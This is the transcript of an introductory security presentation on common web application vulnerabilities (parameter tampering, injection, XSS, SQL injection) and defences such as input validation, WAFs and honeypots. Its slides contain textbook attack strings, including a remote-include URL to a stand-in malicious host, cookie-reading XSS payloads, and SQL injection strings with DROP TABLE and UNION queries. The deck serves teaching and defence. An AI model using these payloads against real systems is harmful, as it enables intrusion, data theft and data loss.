1 / 26

Protecting Against Common Web Application Vulnerabilities

Learn about web applications, common vulnerabilities, and how to protect against them, including top attacks and questions answered.

galet
Download Presentation

Protecting Against Common Web Application Vulnerabilities

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Protecting Against Common Web Application Vulnerabilities Alaa Al-Bahrani Regional Cyber Security Leader, GE

  2. Agenda What? Vulnerabilities 04 01 What are web applications? Common vulnerabilities in web applications How? Protect 05 02 How web applications work? How to protect against web application vulnerabilities Top Attacks Q&A 06 03 Top attacks against web applications Questions

  3. Web Applications Application hosted on a webserver Accessed by a web browser Connects to a database backend Favored by many organizations Vulnerable to attacks! This Photo by Unknown Author is licensed under CC BY-SA This Photo by Unknown Author is licensed under CC BY-SA

  4. How they work? Web Application Web Server 3rd Party Internet Web Browser Database

  5. Top Web Application Attacks Source: www.ptsecurity.com

  6. CMS Market Share WordPress 60% Content Management Systems Around 27% of the Internet is Powered by WordPress, which means approximately 75 million websites are currently running WordPress as a CMS. Joomla 6.5% Drupal 4.6% Source: w3techs.com, January 2018 Source: www.whoishostingthis.com

  7. WordPress Vulnerabilities 2407 vulnerabilities Source: www.wpwhitesecurity.com

  8. Common Vulnerabilities Parameter Tampering Command Injection SQL Injection Cross-Site Scripting (XSS)

  9. Parameter Tampering Attack Definition Manipulation of parameters exchanged between client and server in order to modify application data URL Parameters <input type=”hidden” id=”1008” name=”cost” value=”70.00”> • www.attackbank.com/default.asp?profile=741&debit=1000 <input type=”hidden” id=”1008” name=”cost” value=”70.00”> • www.attackbank.com/default.asp?profile=741&debit=2000 <input type=”hidden” id=”1008” name=”cost” value=”70.00”> • www.attackbank.com/savepage.asp?id=147&status=read <input type=”hidden” id=”1008” name=”cost” value=”70.00”> • www.attackbank.com/savepage.asp?id=147&status=delete Hidden Fields

  10. Injection Attacks Definition Unsolicited commands and data are passed to the web application due to not validating input <input type=”hidden” id=”1008” name=”cost” value=”70.00”> • www.attackbank.com/index.php?page=members.php <input type=”hidden” id=”1008” name=”cost” value=”70.00”> • www.attackbank.com/index.php?page=http://badsite.com/attack.php

  11. Injection Attacks

  12. Cross-Site Scripting (XSS) Definition Allows attackers to inject client-side scripts into web pages. The scripts would then be executed once the client visits the vulnerable web page. Stored Reflected When the victim access the vulnerable website, the malicious script executes Hacker injects vulnerable website with malicious scripts to steal information from victim’s browser 02 01 Website The malicious script sends victim information to the attacker Hacker Victim 03

  13. Cross-Site Scripting (XSS) XSS using Script in Attributes <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <imgsrc="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> XSS using Script Via Encoded URI Schemes <IMG SRC=j&#X41vascript:alert('test2')> XSS using code encoding <META HTTP-EQUIV="refresh“ CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"> <script>alert('test3')</script>

  14. Cross-Site Scripting (XSS) The same could be used to execute stored XSS attacks in guestbook entries, blog posts, and comments.

  15. Cross-Site Scripting (XSS) Error Page Example http://testsite.test/file_which_not_exist Not found: /file_which_not_exist http://testsite.test/<script>alert("TEST");</script> Not found: / (but with JavaScript code <script>alert("TEST");</script>)

  16. SQL Injection • The placement of malicious code in SQL statements, via web page input It is a fault in the code of the web application, not the DBMS • A successful SQL injection exploit can: • read sensitive data from the database, • modify database data (Insert/Update/Delete) • execute administration operations on the database (e.g. shutdown the DBMS) • recover the content of a given file present on the DBMS file system • issue commands to the operating system • Photo Source: https://www.link-academy.com/blog/sql-injection-ghidul-celei-mai-utilizate-metode-de-atac

  17. SQL Injection stringUserID = getRequestString("User_ID"); stringSQL = "SELECT * FROM Users WHEREUser_ID = " + stringUserID; 1=1 (Tautology) Example SELECT * FROM Users WHEREUser_ID = 110 OR 1=1;

  18. SQL Injection stringUserID = getRequestString("User_ID"); stringSQL = "SELECT * FROM Users WHEREUser_ID = " + stringUserID; Batched SQL Statements Example SELECT * FROM Users WHEREUser_ID = 110; DROPTABLE Suppliers;

  19. SQL Injection stringTitle = getRequestString(“Title”); stringSQL = “SELECT * FROM Authors WHERE Title Like %” + stringTitle + “%”; Search Bar (UNION) Example 1 UNIONSELECT 1 FROMinformation_schema.tables --; SELECT * FROM Authors WHERE Title Like 1 UNIONSELECT1FROMinformation_schema.tables --%

  20. SQL Injection • Many tools automate SQL injection attacks • Any input field can be used • Login form • Search bar • Newsletter registration • etc

  21. How To Protect

  22. Defense in Depth Web Application 3rd Party Components Database Web Server Operating System Network Physical Security

  23. Protecting Your Web Application Input Validation Code Testing

  24. Web Application Firewall Web Application Web ApplicationFirewall(WAF) Web Server 3rd Party Internet Web Browser Database

  25. Honeypots • Honeypots are a security system to detect and divert attacks They replicate system services such as web services • They allow collecting more information about the attack • Photo Source: https://www.carnaghan.com/honeypots-to-lure-or-not-to-lure/

  26. Thank You

More Related